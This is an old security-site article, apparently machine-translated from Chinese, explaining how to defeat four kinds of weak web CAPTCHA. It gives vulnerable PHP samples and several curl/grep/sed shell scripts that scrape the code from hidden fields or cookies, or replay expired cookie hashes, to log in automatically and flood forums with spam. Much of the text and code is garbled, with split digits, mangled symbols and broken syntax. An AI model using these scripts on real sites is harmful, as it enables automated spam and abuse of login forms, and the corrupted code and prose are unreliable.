Raiders: CAPTCHA cracking-vulnerability warning-the black bar safety net

ID MYHACK58:62200717939
Type myhack58
Reporter 佚名
Modified 2007-12-30T00:00:00


The so-called verification code, is a string of randomly generated numbers or symbols, to generate a picture, the pictures of Riga on some interference pixel to prevent OCR, and by the user to visually identify where the verification code information,

The input form submission site verification, after successful authentication in order to use a feature. Quite a few websites in order to prevent users from using robots to automatically register, login, irrigation, use the verification code technology.

Many CAPTCHA implementations have problems. Such as directly given by the code in web pages and cookies.

CAPTCHA in the web page example:


<? / Filename: authpage.php Author: hutuworm Date: 2003-04-28 @Copyleft /

srand((double)microtime()*1 0 0 0 0 0 0);

//Validate user input whether the verification code consistent if(isset($HTTP_POST_VARS[’authinput’])) { if(strcmp($HTTP_POST_VARS[’authnum’],$HTTP_POST_VARS[’authinput’])==0) echo "authentication success!"; else echo "validation failed!"; }

//Generate a new four-digit integer code while(($authnum=rand()%1 0 0 0 0)<1 0 0 0); ?& gt; <form action=authpage.php method=post> <table> Please enter the verification code:<input type=text name=authinput style="width: 80px"><br> <input type=submit name="verify" value="submit verification code"> <input type=hidden name=authnum value=<? echo $authnum; ?& gt;> <img src=authimg. php? authnum=<? echo $authnum; ?& gt;> </table> </form>

[Copy to clipboard]

The above example directly to the code stored in the negative, simply download the page, get the CAPTCHA value you can break through the restrictions.


!/ bin/sh

curl authinput=`grep ’<input type=hidden name=authnum value=[[:digit:]]/{4/}>’ grep.txt | sed-e ’s/[^0-9]//g’ #get the web page

authnum curl -d name=hacker-d submit="validate" -d authnum=$authnum

[Copy to clipboard]


session_register("authnum"); $authnum = strval(rand("1 1 1 1","9 9 9 9")); setcookie("authnum",$authnum);

... <input type=text name=authnum maxlength=4><img src=get_code. php> ...

if($number != $login_check_number || empty($number)) { print("checksum incorrect!"); die(); }

[Copy to clipboard]

The second kind of than on the a little smarter, the CAPTCHA value is stored in user Cookies. But since Cookies are user readable and writable, it is also very easy to break.


!/ bin/sh

$username=hacker $password=hackme curl -c common_cookie # receiving the initial Server cookies curl -c $username. cook-b common_cookie # get the verification code from cookies. authnum=grep authnum $username. cook | cut-f7 curl -b $username. cook-d authnum=$authnum-d username=$username-d password=$password # use

cookies in the CAPTCHA login

[Copy to clipboard]

A more advanced CAPTCHA. (It seems like this forum is this。。。。) There is a class of code than the above two kinds of verification code to be advanced some, it uses the following algorithm: 1。 The server generates a random hash. 2。 Use one of the algorithms that are irreversible, crack the high degree of difficulty of the hash is converted into code number, then converted to picture. 3。 hash in the cookie is sent to the client 3。 Customers to image enter the code to login. The server checks the f(hash)=CAPTCHA.

Features: because the attacker does not understand the server used CAPTCHA coding algorithm, it is not possible for the server to go to the hash for direct resolution.

To deal with this CAPTCHA, we can use the“expire cookies”, i.e.: saves the server a specific cookie, which is corresponding to the code set down. In each time you send a verification message, forced to throw away the server came to the cookies, use this has been used cookies, as well as the verification code. Like, a telephone prepaid card can be used multiple times.

Such as: First from the server to download a CAPTCHA picture: curl /news/UploadFiles_9994/2 0 0 7 1 2/2 0 0 7 1 2 1 9 1 8 0 4 5 1 2 0 0. png Artificial reading, get$savecookie(cookie file in the hash and$authnum(CAPTCHA)。 Robot a breakthrough time of verification, to throw away the server to the hash, the mandatory use of$savecookie and$authnum for breakthrough


$savecookie=294b506f05f896dcbb3a0dde86a5e36c $num=7 7 0 1 $username=hacker $password=hackme

curl -c $username. cookie # give the Initialize cookies, and session id grep-v authhash $username. cookie - > tmp.$ username # throw away Server give you the hash echo " FALSE / FALSE 0 hash $savecookie" >> tmp.$ username # force the use of expired hash and CAPTCHA mv tmp.$ username $username. cookie curl -b $username. cookie-c $username. cookies-d username=$username-d password=$password-d

authnum=$num # uses expired verification code landing.

Login is successful, go crazy with the watering。。。。。。

[Copy to clipboard]

The highest level of the code. It uses the following method: 1。 Server through the user-related information of IP, SID, etc. to generate a random hash. 2。 Use one of the algorithms that are irreversible, crack the high degree of difficulty of the hash is converted into code numbers. 3。 hash is no longer sent to the client. It is saved to the local database is usually the SESSIONS, information about the user IP and other information, and by a sequence number seq points. The seq can also be

Is the session id 4。 seq is as the cookies sent to the client. 5。 Customer to pictures enter the verification code. 5。 Server Authentication Method: the server does not check f(hash)==the code, but to read the database in the desired code. to. If the user input and expectations are the same, then the authentication is successful. Some servers might also be in seq and session id of the relationship between the test continues to be validated. 6。 Once the user performs a verify operation or to re-obtain the verification code, but the server will be the database in the hash value is replaced with the New, the Old value for failure expire. Features: ×To expire: because the server only expect to save in the current database in the code, so I can not use the“expired”code as has been the new code replaced it. ×High strength: only send the seq, and the hash is stored locally, so it is extremely difficult to decipher given f(hash)function.

Weaknesses: OCR(optical recognition, seq hijacking the “CAPTCHA”DOS for some seq of repeated requests, causing some users can not perform normal validation to deal with this CAPTCHA, I have no good method, easy methodIs to download the CAPTCHA, and displayed to the user after login. This applies only verified once for the occasion. Such as login authentication.


curl [url]/news/UploadFiles_9994/2 0 0 7 1 2/2 0 0 7 1 2 1 9 1 8 0 4 5 3 7 1 6. png-c validcode_cookie # get the CAPTCHA image, and corresponding to seq. seq=grep seq validcode_cookie | cut-f7 echo-n please input validate. png in the code: read valid_number # enter the verification code

Login, and perform some automated action, such as crazy irrigation.